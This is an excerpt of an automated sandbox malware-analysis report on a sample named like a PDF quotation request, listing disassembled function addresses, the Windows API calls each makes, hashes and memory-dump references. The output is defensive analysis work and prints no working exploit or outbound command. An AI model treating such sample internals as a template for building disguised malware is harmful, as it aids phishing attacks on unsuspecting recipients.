                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2880819207-0
                                                                    • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                    • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                    • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                    • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                    Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                    • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                    • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                    • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                    • String ID:
                                                                    • API String ID: 357397906-0
                                                                    • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                    • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                    • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                    • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                    Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __wsplitpath.LIBCMT ref: 0043392E
                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                    • __wsplitpath.LIBCMT ref: 00433950
                                                                    • __wcsicoll.LIBCMT ref: 00433974
                                                                    • __wcsicoll.LIBCMT ref: 0043398A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                    • String ID:
                                                                    • API String ID: 1187119602-0
                                                                    • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                    • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                    • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                    • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                    Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                    • String ID:
                                                                    • API String ID: 1597257046-0
                                                                    • Opcode ID: 27641d7f5b4c314b80b3255f46ec4c72bfd903a458e0b29326d4da6bd0c91e1b
                                                                    • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                    • Opcode Fuzzy Hash: 27641d7f5b4c314b80b3255f46ec4c72bfd903a458e0b29326d4da6bd0c91e1b
                                                                    • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                    Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                    • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentStrings$Free__malloc_crt
                                                                    • String ID:
                                                                    • API String ID: 237123855-0
                                                                    • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                    • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                    • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                    • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                    Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteDestroyObject$IconWindow
                                                                    • String ID:
                                                                    • API String ID: 3349847261-0
                                                                    • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                    • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                    • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                    • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                    Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                    • String ID:
                                                                    • API String ID: 2223660684-0
                                                                    • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                    • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                    • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                    • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                    Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                    • LineTo.GDI32(?,?,?), ref: 00447326
                                                                    • EndPath.GDI32(?), ref: 00447336
                                                                    • StrokePath.GDI32(?), ref: 00447344
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                    • String ID:
                                                                    • API String ID: 2783949968-0
                                                                    • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                    • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                    • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                    • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                    Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                    • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                    • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 2710830443-0
                                                                    • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                    • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                    • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                    • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                    Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                    • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                      • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                      • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                    • String ID:
                                                                    • API String ID: 146765662-0
                                                                    • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                    • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                    • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                    • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                    Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 00472B63
                                                                    • GetDC.USER32(00000000), ref: 00472B6C
                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                    • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                    • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                    • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                    Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 00472BB2
                                                                    • GetDC.USER32(00000000), ref: 00472BBB
                                                                    • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                    • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                    • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                    • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                    Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __getptd_noexit.LIBCMT ref: 00415150
                                                                      • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                      • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                      • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                      • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                      • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                    • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                    • __freeptd.LIBCMT ref: 0041516B
                                                                    • ExitThread.KERNEL32 ref: 00415173
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 1454798553-0
                                                                    • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                    • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                    • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                    • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                    Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _strncmp
                                                                    • String ID: Q\E
                                                                    • API String ID: 909875538-2189900498
                                                                    • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                    • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                    • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                    • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                    Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                      • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                      • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
